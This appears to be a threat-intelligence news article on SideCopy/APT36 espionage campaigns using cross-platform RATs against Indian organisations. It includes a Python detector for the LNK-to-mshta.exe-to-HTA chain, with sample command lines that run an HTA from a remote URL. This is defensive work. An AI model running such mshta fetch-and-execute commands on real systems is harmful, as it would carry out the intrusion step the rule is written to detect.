Recent cyber espionage efforts have focused on Indian defense and government-aligned organizations, employing cross-platform remote access trojans (RATs) to compromise both Windows and Linux environments. These campaigns are linked to malware families such as Geta RAT, Ares RAT, and DeskRAT, attributed to the threat groups known as SideCopy and APT36 (also referred to as Transparent Tribe).
Campaign Overview
SideCopy has been active since at least 2019 and is believed to operate as a subdivision of APT36. According to Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka, these campaigns reflect a refined approach to espionage rather than a complete overhaul. The groups are enhancing their tactics by expanding cross-platform capabilities and utilizing advanced delivery methods.
Attack Vectors
Phishing emails are the primary attack vector, often containing malicious attachments or links that direct targets to infrastructure controlled by the attackers. These emails typically deliver Windows shortcuts (LNK files), ELF binaries, or PowerPoint Add-In files that initiate a multi-stage process to deploy the trojans. For instance, one attack chain involves a malicious LNK file that executes mshta.exe to run an HTML Application (HTA) file, which then decrypts and executes a DLL payload.
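As an added detection example (not code from the article or from Aryaka's reporting), the following Python flags process-creation events that match the LNK-to-mshta.exe-to-HTA chain just described; the event field names follow Sysmon Event ID 1 naming, and the sample events, paths and URL are constructed for this example.

```python
"""Detection logic for the LNK -> mshta.exe -> HTA chain described above.

Scans constructed process-creation events (Sysmon Event ID 1 style, flattened
to dicts) and flags mshta.exe launches that run an .hta from a remote URL or a
user-writable path. The event shape and sample values are assumptions for this
example, not data from the campaign.
"""
import re
from typing import Iterable

# Directories from which a legitimately deployed HTA is rarely run (assumed list).
SUSPICIOUS_PATH = re.compile(r"(\\appdata\\|\\temp\\|\\downloads\\|\\users\\public\\)", re.I)
REMOTE_HTA = re.compile(r"https?://\S+", re.I)
HTA_ARG = re.compile(r"\.hta\b", re.I)


def is_suspicious_mshta(event: dict) -> bool:
    """True for an mshta.exe process whose command line runs an HTA from a
    remote URL or a user-writable directory; False for anything else."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return False
    cmd = event.get("CommandLine", "")
    if not HTA_ARG.search(cmd):
        return False
    return bool(REMOTE_HTA.search(cmd) or SUSPICIOUS_PATH.search(cmd))


def find_hta_chains(events: Iterable[dict]) -> list[str]:
    """Return the ProcessGuid of every suspicious mshta.exe event, in order."""
    return [e["ProcessGuid"] for e in events if is_suspicious_mshta(e)]


# Constructed sample events (not real telemetry). p1 and p2 model the chain:
# explorer.exe (user opened the LNK) or cmd.exe spawning mshta.exe on an HTA.
SAMPLE_EVENTS = [
    {"ProcessGuid": "p1", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\alice\AppData\Local\Temp\notice.hta'},
    {"ProcessGuid": "p2", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe http://example.invalid/doc.hta"},
    {"ProcessGuid": "p3", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
    {"ProcessGuid": "p4", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe report.txt"},
]

if __name__ == "__main__":
    print(find_hta_chains(SAMPLE_EVENTS))  # ['p1', 'p2']
```

The path list is a starting point; tune it to where HTAs are legitimately deployed in your estate, and pair the rule with the DLL-load telemetry that follows the HTA stage.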
Malware Capabilities
The malware is designed to maintain persistent remote access, conduct system reconnaissance, and collect sensitive data. Geta RAT can execute various commands, including gathering credentials, capturing screenshots, and managing file operations. In parallel, a Linux variant utilizes a Go binary to deploy Ares RAT, which also supports a range of commands for data harvesting.
Strategic Targeting
Aryaka has noted that these campaigns are not limited to the defense sector but extend to policy, research, and critical infrastructure organizations. The use of DeskRAT alongside other RATs signifies a sophisticated toolkit aimed at ensuring stealth and long-term access to compromised systems. The deployment of these malware families underscores a deliberate strategy to exploit trusted infrastructures and impersonate official documents.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.